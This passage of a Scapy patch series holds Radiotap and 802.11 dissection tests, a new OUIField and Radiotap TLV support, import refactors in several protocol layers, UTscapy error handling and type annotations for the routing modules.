b'\x00\x008\x00k\x084\x00oo\x0f\x98\x00\x00\x00\x00\x10\x00\x99\x16@\x01\xc5\xa1\x01\x00\x00\x00@\x01\x02\x00\x99\x16\x9d"\x05\x0b\x00\x00\x00\x00\x00\x00\xff\x01\x16\x01\x82\x00\x00\x00\x01\x00\x00\x00\x88\x020\x00\xb8\xe8VB_\xb2\x82*\xa8Uq\x15\xf0\x9f\xc2\x11\x16dP\xb0\x00\x00\xaa\xaa\x03\x00\x00\x00\x08\x00E\x00\x00GC\xad@\x007\x11\x97;\xd0C\xde{\xac\x10\r\xee\x005\xed\xec\x003\xd5/\xfc\\\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00\tlocalhost\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\t:\x80\x00\x04\x7f\x00\x00\x01\xcdj\x88]' +r = RadioTap(data) +r = RadioTap(raw(r)) +assert r.dBm_AntSignal == -59 +assert r.ChannelFrequency == 5785 +assert r.ChannelPlusFrequency == 5785 +assert r.present == 3410027 +assert r.A_MPDU_ref == 2821 +assert r.KnownVHT == 511 +assert r.PresentVHT == 22 +assert r.notdecoded == b'' + += RadioTap Big-Small endian dissection +data = b'\x00\x00\x1a\x00/H\x00\x00\xe1\xd3\xcb\x05\x00\x00\x00\x00@0x\x14@\x01\xac\x00\x00\x00' +r = RadioTap(data) +r.show() +assert r.present == 18479 + += RadioTap MCS dissection +data = b"\x00\x00\x0b\x00\x00\x00\x08\x00?,\x05" +r = RadioTap(data) +r.show() +assert r.present.MCS +assert r.knownMCS.MCS_bandwidth +assert r.knownMCS.MCS_index +assert r.knownMCS.guard_interval +assert r.knownMCS.HT_format +assert r.knownMCS.FEC_type +assert r.knownMCS.STBC_streams +assert not r.knownMCS.Ness +assert not r.knownMCS.Ness_MSB +assert r.MCS_bandwidth == 0 +assert r.guard_interval == 1 +assert r.HT_format == 1 +assert r.FEC_type == 0 +assert r.STBC_streams == 1 +assert r.MCS_index == 5 +assert r.Ness_LSB == 0 + += RadioTap RX/TX Flags dissection +data = b'\x00\x00\x0c\x00\x00\xc0\x00\x00\x02\x00\x3f\x00' +r = RadioTap(data) +r.show() +assert r.present.TXFlags +assert r.TXFlags.TX_FAIL +assert r.TXFlags.CTS +assert r.TXFlags.RTS +assert r.TXFlags.NOACK +assert r.TXFlags.NOSEQ +assert r.TXFlags.ORDER +assert r.present.RXFlags +assert r.RXFlags.BAD_PLCP + += RadioTap, other fields + +data = b'\x00\x00 \x00\xae@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x10\x02\x85\t\xa0\x00\xe2\x00d\x00\x00\x00\x00\x00\x00\x01\xa0@:\x01\x00\xc0\xca\xa4}PLfA\xac\xe4\xb3\x00\xc04\xeb\xca\xa4}P\x00 \x08 \x00\x00\x00\x00\x0f)\x1d\xd4\xd49\x00\x03\x1f>' +r = RadioTap(data) +assert Dot11TKIP in r +assert r[Dot11] +assert r.dBm_AntSignal == -30 +assert r.Lock_Quality == 100 +assert r.RXFlags == 0 + += RadioTap - Dissection - guess_payload_class() test +data = b'\x00\x00\r\x00\x04\x80\x02\x00\x02\x00\x00\x00\x00@\x00\x00\x00\xff\xff\xff\xff\xff\xff\xe8\x94\xf6\x1c\xdf\x8b\xff\xff\xff\xff\xff\xff\xa0\x01\x00\x10ciscosb-wpa2-eap\x01\x08\x02\x04\x0b\x16\x0c\x12\x18$2\x040H`l\x03\x01\x01-\x1an\x11\x1b\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +radiotap = RadioTap(data) +assert radiotap.present.Rate +assert radiotap.present.TXFlags +assert radiotap.present.b18 +assert radiotap.present == 163844 +assert radiotap.guess_payload_class("") == Dot11 + += RadioTap - Dissection with Extended presence mask +data = b"\x00\x00 \x00\xae@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x10\x02\x9e\t\xa0\x00\xa2\x00d\x00\x00\x00\x00\x00\x00\x01\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\x94S0\xe8\x93\xb2\x94S0\xe8\x93\xb2\xf0u\x85\xe1H\x9c\x08\x00\x00\x00d\x00\x11\x14\x00\x08Why Fye?\x01\x08\x82\x84\x8b\x96$0Hl\x03\x01\x0b\x05\x04\x00\x01\x00\x00*\x01\x04/\x01\x040\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x0c\x002\x04\x0c\x12\x18`\x0b\x05\x07\x00;\x00\x00-\x1a\xad\x19\x17\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x0b\x08\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x08\x04\x00\x08\x00\x00\x00\x00@\xdd1\x00P\xf2\x04\x10J\x00\x01\x10\x10D\x00\x01\x02\x10G\x00\x10\xef\xda]\xd2#\xe8\xa7\xf0\xb2/\xa4\x98\xbf\x0cv\xe7\x10<\x00\x01\x03\x10I\x00\x06\x007*\x00\x01 \xdd\t\x00\x10\x18\x02\x07\x00\x1c\x00\x00\xdd\x18\x00P\xf2\x02\x01\x01\x80\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00F\x05r\x08\x01\x00\x00\xdd\x1e\x00\x90L\x04\x08\xbf\x0c\xb2Y\x82\x0f\xea\xff\x00\x00\xea\xff\x00\x00\xc0\x05\x00\x0b\x00\x00\x00\xc3\x02\x00\x02\x08I\xc0\xdb" +radiotap = RadioTap(data) + +assert radiotap.present.Ext +assert len(radiotap.Ext) == 2 +assert radiotap.Ext[0].present.b5 +assert radiotap.Ext[0].present.b11 +assert radiotap.Ext[0].present.b29 +assert radiotap.Ext[0].present.Ext +assert radiotap.Ext[1].present.b37 +assert radiotap.Ext[1].present.b43 +assert not radiotap.Ext[1].present.Ext + +assert radiotap.present.Flags +assert radiotap.Flags.FCS +assert Dot11FCS in radiotap +assert radiotap.fcs == 0xdbc04908 + +assert Dot11EltRates in radiotap +assert radiotap[Dot11EltRates].rates == [130, 132, 139, 150, 36, 48, 72, 108] + += RadioTap - Build with Extended presence mask + +a = RadioTapExtendedPresenceMask(present="b0+b12+b29+Ext") +b = RadioTapExtendedPresenceMask(index=1, present="b32+b45+b59+b62") +pkt = RadioTap(present="Ext", Ext=[a, b]) +assert raw(pkt) == b'\x00\x00\x10\x00\x00\x00\x00\x80\x01\x10\x00\xa0\x01 \x00H' + += fuzz() calls for Dot11Elt() +for i in range(10): + assert isinstance(raw(fuzz(Dot11Elt())), bytes) + += PMKIDListPacket - Check computation of nb_pmkids +assert PMKIDListPacket(raw(PMKIDListPacket())).nb_pmkids == 0 +assert PMKIDListPacket(raw(PMKIDListPacket(pmkid_list=["AZEDFREZSDERFGTY"]))).nb_pmkids == 1 +assert PMKIDListPacket(raw(PMKIDListPacket(pmkid_list=["0123456789ABDEFX", "AZEDFREZSDERFGTY"]))).nb_pmkids == 2 + += Dot11EltRSN - Check computation of nb_pairwise_cipher_suites and nb_akm_suites +assert Dot11EltRSN(raw(Dot11EltRSN())).nb_pairwise_cipher_suites == 1 +assert Dot11EltRSN(raw(Dot11EltRSN(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP")]))).nb_pairwise_cipher_suites == 1 +assert Dot11EltRSN(raw(Dot11EltRSN(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP"), RSNCipherSuite(cipher="CCMP-128")]))).nb_pairwise_cipher_suites == 2 +assert Dot11EltRSN(raw(Dot11EltRSN())).nb_akm_suites == 1 +assert Dot11EltRSN(raw(Dot11EltRSN(akm_suites=[AKMSuite(suite="PSK")]))).nb_akm_suites == 1 +assert Dot11EltRSN(raw(Dot11EltRSN(akm_suites=[AKMSuite(suite="PSK"), AKMSuite(suite="802.1X")]))).nb_akm_suites == 2 + += Dot11EltMicrosoftWPA - Check computation of nb_pairwise_cipher_suites and nb_akm_suites +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA())).nb_pairwise_cipher_suites == 1 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP")]))).nb_pairwise_cipher_suites == 1 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(pairwise_cipher_suites=[RSNCipherSuite(cipher="TKIP"), RSNCipherSuite(cipher="CCMP-128")]))).nb_pairwise_cipher_suites == 2 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA())).nb_akm_suites == 1 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(akm_suites=[AKMSuite(suite="PSK")]))).nb_akm_suites == 1 +assert Dot11EltMicrosoftWPA(raw(Dot11EltMicrosoftWPA(akm_suites=[AKMSuite(suite="PSK"), AKMSuite(suite="802.1X")]))).nb_akm_suites == 2 + From 044f69ebf34bda772d079329eced804f0f67bf0f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 19 Oct 2020 16:13:29 +0200 Subject: [PATCH 0334/1632] Add support for Radiotap TLVs --- scapy/fields.py | 15 ++++ scapy/layers/dot11.py | 143 +++++++++++++++++++++++------------- test/scapy/layers/dot11.uts | 21 ++++++ 3 files changed, 128 insertions(+), 51 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index b27e2a7518a..ef7c01bedc4 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -3280,6 +3280,21 @@ def __init__(self, name, default, size, *args, **kwargs): BitField.__init__(self, name, default, size) # type: ignore +class OUIField(X3BytesField): + """ + A field designed to carry a OUI (3 bytes) + """ + def i2repr(self, pkt, val): + # type: (Optional[BasePacket], int) -> str + by_val = struct.pack("!I", val or 0)[1:] + oui = str2mac(by_val + b"\0" * 3)[:8] + if conf.manufdb: + fancy = conf.manufdb._get_manuf(oui) + if fancy != oui: + return "%s (%s)" % (fancy, oui) + return oui + + class UUIDField(Field[UUID, bytes]): """Field for UUID storage, wrapping Python's uuid.UUID type. diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 828c9df9be4..2cc26b2e429 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -52,6 +52,7 @@ LEShortField, LESignedIntField, MultipleTypeField, + OUIField, PacketField, PacketListField, ReversePadField, @@ -60,7 +61,6 @@ StrField, StrFixedLenField, StrLenField, - X3BytesField, XByteField, XStrFixedLenField, ) @@ -70,7 +70,6 @@ from scapy.layers.inet import IP, TCP from scapy.error import warning, log_loading from scapy.sendrecv import sniff, sendp -from scapy.utils import str2mac if conf.crypto_valid: @@ -150,40 +149,6 @@ def answers(self, other): # Note: Radiotap alignment is crazy. See the doc: # https://www.radiotap.org/#alignment-in-radiotap - -def _next_radiotap_extpm(pkt, lst, cur, s): - """Generates the next RadioTapExtendedPresenceMask""" - if cur is None or (cur.present and cur.present.Ext): - st = len(lst) + (cur is not None) - return lambda *args: RadioTapExtendedPresenceMask(*args, index=st) - return None - - -class RadioTapExtendedPresenceMask(Packet): - """RadioTapExtendedPresenceMask should be instantiated by passing an - `index=` kwarg, stating which place the item has in the list. - - Passing index will update the b[x] fields accordingly to the index. - e.g. - >>> a = RadioTapExtendedPresenceMask(present="b0+b12+b29+Ext") - >>> b = RadioTapExtendedPresenceMask(index=1, present="b33+b45+b59+b62") - >>> pkt = RadioTap(present="Ext", Ext=[a, b]) - """ - name = "RadioTap Extended presence mask" - fields_desc = [FlagsField('present', None, -32, - ["b%s" % i for i in range(0, 31)] + ["Ext"])] - - def __init__(self, _pkt=None, index=0, **kwargs): - self._restart_indentation(index) - Packet.__init__(self, _pkt, **kwargs) - - def _restart_indentation(self, index): - st = index * 32 - self.fields_desc[0].names = ["b%s" % (i + st) for i in range(0, 31)] + ["Ext"] # noqa: E501 - - def guess_payload_class(self, pay): - return conf.padding_layer - # RadioTap constants @@ -193,7 +158,7 @@ def guess_payload_class(self, pay): 'dB_AntSignal', 'dB_AntNoise', 'RXFlags', 'TXFlags', 'b17', 'b18', 'ChannelPlus', 'MCS', 'A_MPDU', 'VHT', 'timestamp', 'HE', 'HE_MU', 'HE_MU_other_user', - 'zero_length_psdu', 'L_SIG', 'b28', + 'zero_length_psdu', 'L_SIG', 'TLV', 'RadiotapNS', 'VendorNS', 'Ext'] # Note: Inconsistencies with wireshark @@ -259,6 +224,85 @@ def guess_payload_class(self, pay): } +# Radiotap utils + +# Note: extended presence masks are dissected pretty dumbly by +# Wireshark. + +def _next_radiotap_extpm(pkt, lst, cur, s): + """Generates the next RadioTapExtendedPresenceMask""" + if cur is None or (cur.present and cur.present.Ext): + st = len(lst) + (cur is not None) + return lambda *args: RadioTapExtendedPresenceMask(*args, index=st) + return None + + +class RadioTapExtendedPresenceMask(Packet): + """RadioTapExtendedPresenceMask should be instantiated by passing an + `index=` kwarg, stating which place the item has in the list. + + Passing index will update the b[x] fields accordingly to the index. + e.g. + >>> a = RadioTapExtendedPresenceMask(present="b0+b12+b29+Ext") + >>> b = RadioTapExtendedPresenceMask(index=1, present="b33+b45+b59+b62") + >>> pkt = RadioTap(present="Ext", Ext=[a, b]) + """ + name = "RadioTap Extended presence mask" + fields_desc = [FlagsField('present', None, -32, + ["b%s" % i for i in range(0, 31)] + ["Ext"])] + + def __init__(self, _pkt=None, index=0, **kwargs): + self._restart_indentation(index) + Packet.__init__(self, _pkt, **kwargs) + + def _restart_indentation(self, index): + st = index * 32 + self.fields_desc[0].names = ["b%s" % (i + st) for i in range(0, 31)] + ["Ext"] # noqa: E501 + + def guess_payload_class(self, pay): + return conf.padding_layer + + +# This is still unimplemented in Wireshark +# https://www.radiotap.org/fields/TLV.html +class RadioTapTLV(Packet): + fields_desc = [ + LEShortEnumField("type", 0, _rt_present), + LEShortField("length", None), + ConditionalField( + OUIField("oui", 0), + lambda pkt: pkt.type == 30 # VendorNS + ), + ConditionalField( + ByteField("subtype", 0), + lambda pkt: pkt.type == 30 + ), + ConditionalField( + LEShortField("presence_type", 0), + lambda pkt: pkt.type == 30 + ), + ConditionalField( + LEShortField("reserved", 0), + lambda pkt: pkt.type == 30 + ), + StrLenField("data", b"", + length_from=lambda pkt: pkt.length), + StrLenField("pad", None, length_from=lambda pkt: -pkt.length % 4) + ] + + def post_build(self, pkt, pay): + if self.length is None: + pkt = pkt[:2] + struct.pack(" Date: Mon, 19 Oct 2020 16:23:51 +0200 Subject: [PATCH 0335/1632] Use OUIField when possible --- scapy/contrib/cdp.py | 20 ++++++++++++++++---- scapy/contrib/homeplugav.py | 31 +++++++++++++++++++++++++------ scapy/layers/l2.py | 35 +++++++++++++++++++++++++++-------- scapy/layers/ppp.py | 25 ++++++++++++++++++++----- test/regression.uts | 4 ++-- 5 files changed, 90 insertions(+), 25 deletions(-) diff --git a/scapy/contrib/cdp.py b/scapy/contrib/cdp.py index 54ad71faaee..fa1165387fa 100644 --- a/scapy/contrib/cdp.py +++ b/scapy/contrib/cdp.py @@ -25,9 +25,21 @@ import struct from scapy.packet import Packet, bind_layers -from scapy.fields import ByteEnumField, ByteField, FieldLenField, FlagsField, \ - IP6Field, IPField, PacketListField, ShortField, StrLenField, \ - X3BytesField, XByteField, XShortEnumField, XShortField +from scapy.fields import ( + ByteEnumField, + ByteField, + FieldLenField, + FlagsField, + IP6Field, + IPField, + OUIField, + PacketListField, + ShortField, + StrLenField, + XByteField, + XShortEnumField, + XShortField, +) from scapy.layers.inet import checksum from scapy.layers.l2 import SNAP from scapy.compat import orb, chb @@ -261,7 +273,7 @@ class CDPMsgProtoHello(CDPMsgGeneric): type = 0x0008 fields_desc = [XShortEnumField("type", 0x0008, _cdp_tlv_types), ShortField("len", 32), - X3BytesField("oui", 0x00000c), + OUIField("oui", 0x00000c), XShortField("protocol_id", 0x0), # TLV length (len) - 2 (type) - 2 (len) - 3 (OUI) - 2 # (Protocol ID) diff --git a/scapy/contrib/homeplugav.py b/scapy/contrib/homeplugav.py index 57823766868..171eb7d0215 100644 --- a/scapy/contrib/homeplugav.py +++ b/scapy/contrib/homeplugav.py @@ -19,11 +19,30 @@ import struct from scapy.packet import Packet, bind_layers -from scapy.fields import BitField, ByteEnumField, ByteField, \ - ConditionalField, EnumField, FieldLenField, IntField, LEIntField, \ - LELongField, LEShortField, MACField, PacketListField, ShortField, \ - StrFixedLenField, StrLenField, X3BytesField, XByteField, XIntField, \ - XLongField, XShortField, LEShortEnumField +from scapy.fields import ( + BitField, + ByteEnumField, + ByteField, + ConditionalField, + EnumField, + FieldLenField, + IntField, + LEIntField, + LELongField, + LEShortEnumField, + LEShortField, + MACField, + OUIField, + PacketListField, + ShortField, + StrFixedLenField, + StrLenField, + X3BytesField, + XByteField, + XIntField, + XLongField, + XShortField, +) from scapy.layers.l2 import Ether from scapy.modules.six.moves import range @@ -176,7 +195,7 @@ class MACManagementHeader(Packet): class VendorMME(Packet): name = "VendorMME " - fields_desc = [X3BytesField("OUI", 0x00b052)] + fields_desc = [OUIField("OUI", 0x00b052)] class GetDeviceVersion(Packet): diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 0bde516b8f6..3b00f8403b1 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -25,13 +25,32 @@ DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, \ ETH_P_MACSEC from scapy.error import warning, ScapyNoDstMacException -from scapy.fields import BCDFloatField, BitField, ByteField, \ - ConditionalField, FieldLenField, FCSField, \ - IntEnumField, IntField, IP6Field, IPField, \ - LenField, MACField, MultipleTypeField, \ - ShortEnumField, ShortField, SourceIP6Field, SourceIPField, \ - StrFixedLenField, StrLenField, X3BytesField, XByteField, XIntField, \ - XShortEnumField, XShortField +from scapy.fields import ( + BCDFloatField, + BitField, + ByteField, + ConditionalField, + FCSField, + FieldLenField, + IP6Field, + IPField, + IntEnumField, + IntField, + LenField, + MACField, + MultipleTypeField, + OUIField, + ShortEnumField, + ShortField, + SourceIP6Field, + SourceIPField, + StrFixedLenField, + StrLenField, + XByteField, + XIntField, + XShortEnumField, + XShortField, +) from scapy.modules.six import viewitems from scapy.packet import bind_layers, Packet from scapy.plist import PacketList, SndRcvList @@ -253,7 +272,7 @@ class MPacketPreamble(Packet): class SNAP(Packet): name = "SNAP" - fields_desc = [X3BytesField("OUI", 0x000000), + fields_desc = [OUIField("OUI", 0x000000), XShortEnumField("code", 0x000, ETHER_TYPES)] diff --git a/scapy/layers/ppp.py b/scapy/layers/ppp.py index 01c9e027a7e..eb3e98750a3 100644 --- a/scapy/layers/ppp.py +++ b/scapy/layers/ppp.py @@ -19,10 +19,25 @@ from scapy.layers.l2 import Ether, CookedLinux, GRE_PPTP from scapy.layers.inet import IP from scapy.layers.inet6 import IPv6 -from scapy.fields import BitField, ByteEnumField, ByteField, \ - ConditionalField, EnumField, FieldLenField, IntField, IPField, \ - PacketListField, PacketField, ShortEnumField, ShortField, \ - StrFixedLenField, StrLenField, XByteField, XShortField, XStrLenField +from scapy.fields import ( + BitField, + ByteEnumField, + ByteField, + ConditionalField, + EnumField, + FieldLenField, + IPField, + IntField, + OUIField, + PacketField, + PacketListField, + ShortEnumField, + ShortField, + StrLenField, + XByteField, + XShortField, + XStrLenField, +) from scapy.modules import six @@ -449,7 +464,7 @@ class PPP_ECP_Option_OUI(PPP_ECP_Option): ByteEnumField("type", 0, _PPP_ecpopttypes), FieldLenField("len", None, length_of="data", fmt="B", adjust=lambda _, val: val + 6), - StrFixedLenField("oui", "", 3), + OUIField("oui", 0), ByteField("subtype", 0), StrLenField("data", "", length_from=lambda pkt: pkt.len - 6), ] diff --git a/test/regression.uts b/test/regression.uts index a2a40290425..efb8e7b23d8 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2434,7 +2434,7 @@ assert( q[PPP_IPCP_Option_NBNS2].data == '9.10.11.12' ) = PPP ECP ~ ppp ecp -p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui="XYZ")]) +p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui=0x58595a)]) p r = raw(p) r @@ -2442,7 +2442,7 @@ assert(r == b'\x80S\x01\x00\x00\n\x00\x06XYZ\x00') q = PPP(r) q assert(raw(p) == raw(q)) -p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui="XYZ"),PPP_ECP_Option(type=1,data="ABCDEFG")]) +p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui=0x58595a),PPP_ECP_Option(type=1,data="ABCDEFG")]) p r = raw(p) r From a45f3a81e1d0e4a8ae20268170189b9e6d2f2347 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 20 Oct 2020 18:20:59 +0200 Subject: [PATCH 0336/1632] UTscapy: raise an error if a UTS file is invalid --- scapy/tools/UTscapy.py | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index e91a91ffa78..9a66e9ddfbb 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -381,8 +381,7 @@ def parse_campaign_file(campaign_file): else: if test is None: if line.strip(): - print("Unknown content [%s]" % line.strip(), - file=sys.stderr) + raise ValueError("Unknown content [%s]" % line.strip()) else: test.test += line return test_campaign @@ -835,7 +834,12 @@ def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOC autorun_func, theme, pos_begin=0, ignore_globals=None, scapy_ses=None): # noqa: E501 # Parse test file - test_campaign = parse_campaign_file(TESTFILE) + try: + test_campaign = parse_campaign_file(TESTFILE) + except ValueError as ex: + print(theme.red("Error while parsing '%s': '%s'" % (TESTFILE.name, ex)), + file=sys.stderr) + sys.exit(0) # Report parameters if PREEXEC: @@ -918,7 +922,7 @@ def main(): import scapy print(dash + " UTScapy - Scapy %s - %s" % ( scapy.__version__, sys.version.split(" ")[0] - )) + ), file=sys.stderr) # Parse arguments @@ -1041,21 +1045,21 @@ def main(): if six.PY2: KW_KO.append("python3_only") if VERB > 2: - print(" " + arrow + " Python 2 mode") + print(" " + arrow + " Python 2 mode", file=sys.stderr) try: if NON_ROOT or os.getuid() != 0: # Non root # Discard root tests KW_KO.append("netaccess") KW_KO.append("needs_root") if VERB > 2: - print(" " + arrow + " Non-root mode") + print(" " + arrow + " Non-root mode", file=sys.stderr) except AttributeError: pass if conf.use_pcap: KW_KO.append("not_pcapdnet") if VERB > 2: - print(" " + arrow + " libpcap mode ###") + print(" " + arrow + " libpcap mode", file=sys.stderr) KW_KO.append("disabled") From d80bc5fa710080c545bf137969d2f914aa10f195 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 11 Oct 2020 17:55:24 +0200 Subject: [PATCH 0337/1632] Core typing: route.py & route6.py --- .config/mypy/mypy_enabled.txt | 4 +- scapy/fields.py | 6 +-- scapy/route.py | 52 ++++++++++++++++++----- scapy/route6.py | 79 ++++++++++++++++++++++++----------- test/regression.uts | 1 + 5 files changed, 102 insertions(+), 40 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 837d20d8f0d..a9ba5154b13 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -6,12 +6,14 @@ # CORE scapy/__init__.py -scapy/main.py scapy/compat.py scapy/config.py scapy/fields.py +scapy/main.py scapy/packet.py scapy/plist.py +scapy/route.py +scapy/route6.py scapy/utils.py # LAYERS diff --git a/scapy/fields.py b/scapy/fields.py index b27e2a7518a..438e6188cc9 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -737,13 +737,13 @@ def __findaddr(self, pkt): else getattr(pkt, self.dstname) or "0.0.0.0") if isinstance(dst, (Gen, list)): r = { - conf.route.route(str(daddr)) # type: ignore + conf.route.route(str(daddr)) for daddr in dst } # type: Set[Tuple[str, str, str]] if len(r) > 1: warning("More than one possible route for %r" % (dst,)) return min(r)[1] - return conf.route.route(dst)[1] # type: ignore + return conf.route.route(dst)[1] def i2m(self, pkt, x): # type: (BasePacket, Optional[str]) -> bytes @@ -837,7 +837,7 @@ def i2h(self, pkt, x): import scapy.route6 # noqa: F401 dst = ("::" if self.dstname is None else getattr(pkt, self.dstname)) # noqa: E501 if isinstance(dst, (Gen, list)): - r = {conf.route6.route(str(daddr)) # type: ignore + r = {conf.route6.route(str(daddr)) for daddr in dst} if len(r) > 1: warning("More than one possible route for %r" % (dst,)) diff --git a/scapy/route.py b/scapy/route.py index 4b6b98fff6f..0bd2e51099a 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -10,10 +10,21 @@ from __future__ import absolute_import +from scapy.compat import plain_str from scapy.config import conf from scapy.error import Scapy_Exception, warning from scapy.interfaces import resolve_iface -from scapy.utils import atol, ltoa, itom, plain_str, pretty_list +from scapy.utils import atol, ltoa, itom, pretty_list + +from scapy.compat import ( + Any, + Dict, + List, + Optional, + Tuple, + Union, + cast, +) ############################## @@ -22,20 +33,25 @@ class Route: def __init__(self): + # type: () -> None + self.routes = [] # type: List[Tuple[int, int, str, str, str, int]] self.resync() def invalidate_cache(self): - self.cache = {} + # type: () -> None + self.cache = {} # type: Dict[str, Tuple[str, str, str]] def resync(self): + # type: () -> None from scapy.arch import read_routes self.invalidate_cache() self.routes = read_routes() def __repr__(self): - rtlst = [] + # type: () -> str + rtlst = [] # type: List[Tuple[Union[str, List[str]], ...]] for net, msk, gw, iface, addr, metric in self.routes: - if_repr = resolve_iface(iface).description + if_repr = cast(str, resolve_iface(iface).description) rtlst.append((ltoa(net), ltoa(msk), gw, @@ -46,13 +62,20 @@ def __repr__(self): return pretty_list(rtlst, [("Network", "Netmask", "Gateway", "Iface", "Output IP", "Metric")]) # noqa: E501 - def make_route(self, host=None, net=None, gw=None, dev=None, metric=1): + def make_route(self, + host=None, # type: Optional[str] + net=None, # type: Optional[str] + gw=None, # type: Optional[str] + dev=None, # type: Optional[Any] + metric=1, # type: int + ): + # type: (...) -> Tuple[int, int, str, str, str, int] from scapy.arch import get_if_addr if host is not None: thenet, msk = host, 32 elif net is not None: - thenet, msk = net.split("/") - msk = int(msk) + thenet, msk_b = net.split("/") + msk = int(msk_b) else: raise Scapy_Exception("make_route: Incorrect parameters. You should specify a host or a net") # noqa: E501 if gw is None: @@ -68,6 +91,7 @@ def make_route(self, host=None, net=None, gw=None, dev=None, metric=1): return (atol(thenet), itom(msk), gw, dev, ifaddr, metric) def add(self, *args, **kargs): + # type: (*Any, **Any) -> None """Ex: add(net="192.168.1.0/24",gw="1.2.3.4") """ @@ -75,6 +99,7 @@ def add(self, *args, **kargs): self.routes.append(self.make_route(*args, **kargs)) def delt(self, *args, **kargs): + # type: (*Any, **Any) -> None """delt(host|net, gw|dev)""" self.invalidate_cache() route = self.make_route(*args, **kargs) @@ -85,9 +110,10 @@ def delt(self, *args, **kargs): raise ValueError("No matching route found!") def ifchange(self, iff, addr): + # type: (str, str) -> None self.invalidate_cache() - the_addr, the_msk = (addr.split("/") + ["32"])[:2] - the_msk = itom(int(the_msk)) + the_addr, the_msk_b = (addr.split("/") + ["32"])[:2] + the_msk = itom(int(the_msk_b)) the_rawaddr = atol(the_addr) the_net = the_rawaddr & the_msk @@ -102,6 +128,7 @@ def ifchange(self, iff, addr): conf.netcache.flush() def ifdel(self, iff): + # type: (str) -> None self.invalidate_cache() new_routes = [] for rt in self.routes: @@ -111,14 +138,16 @@ def ifdel(self, iff): self.routes = new_routes def ifadd(self, iff, addr): + # type: (str, str) -> None self.invalidate_cache() - the_addr, the_msk = (addr.split("/") + ["32"])[:2] - the_msk = itom(int(the_msk)) + the_addr, the_msk_b = (addr.split("/") + ["32"])[:2] + the_msk = itom(int(the_msk_b)) the_rawaddr = atol(the_addr) the_net = the_rawaddr & the_msk self.routes.append((the_net, the_msk, '0.0.0.0', iff, the_addr, 1)) def route(self, dst=None, verbose=conf.verb): + # type: (Optional[str], int) -> Tuple[str, str, str] """Returns the IPv4 routes to a host. parameters: - dst: the IPv4 of the destination host @@ -171,6 +200,7 @@ def route(self, dst=None, verbose=conf.verb): return ret def get_if_bcast(self, iff): + # type: (str) -> List[str] bcast_list = [] for net, msk, gw, iface, addr, metric in self.routes: if net == 0: diff --git a/scapy/route6.py b/scapy/route6.py index 081d9fea487..f88277e98cc 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -27,22 +27,37 @@ from scapy.error import warning, log_loading from scapy.utils import pretty_list +from scapy.compat import ( + Any, + Dict, + List, + Optional, + Set, + Tuple, + Union, + cast, +) + class Route6: def __init__(self): + # type: () -> None self.resync() self.invalidate_cache() def invalidate_cache(self): - self.cache = {} + # type: () -> None + self.cache = {} # type: Dict[str, Tuple[str, str, str]] def flush(self): + # type: () -> None self.invalidate_cache() - self.ipv6_ifaces = set() - self.routes = [] + self.ipv6_ifaces = set() # type: Set[str] + self.routes = [] # type: List[Tuple[str, int, str, str, List[str], int]] # noqa: E501 def resync(self): + # type: () -> None # TODO : At the moment, resync will drop existing Teredo routes # if any. Change that ... self.invalidate_cache() @@ -54,10 +69,11 @@ def resync(self): log_loading.info("No IPv6 support in kernel") def __repr__(self): - rtlst = [] + # type: () -> str + rtlst = [] # type: List[Tuple[Union[str, List[str]], ...]] for net, msk, gw, iface, cset, metric in self.routes: - if_repr = resolve_iface(iface).description + if_repr = cast(str, resolve_iface(iface).description) rtlst.append(('%s/%i' % (net, msk), gw, if_repr, @@ -71,16 +87,22 @@ def __repr__(self): # Unlike Scapy's Route.make_route() function, we do not have 'host' and 'net' # 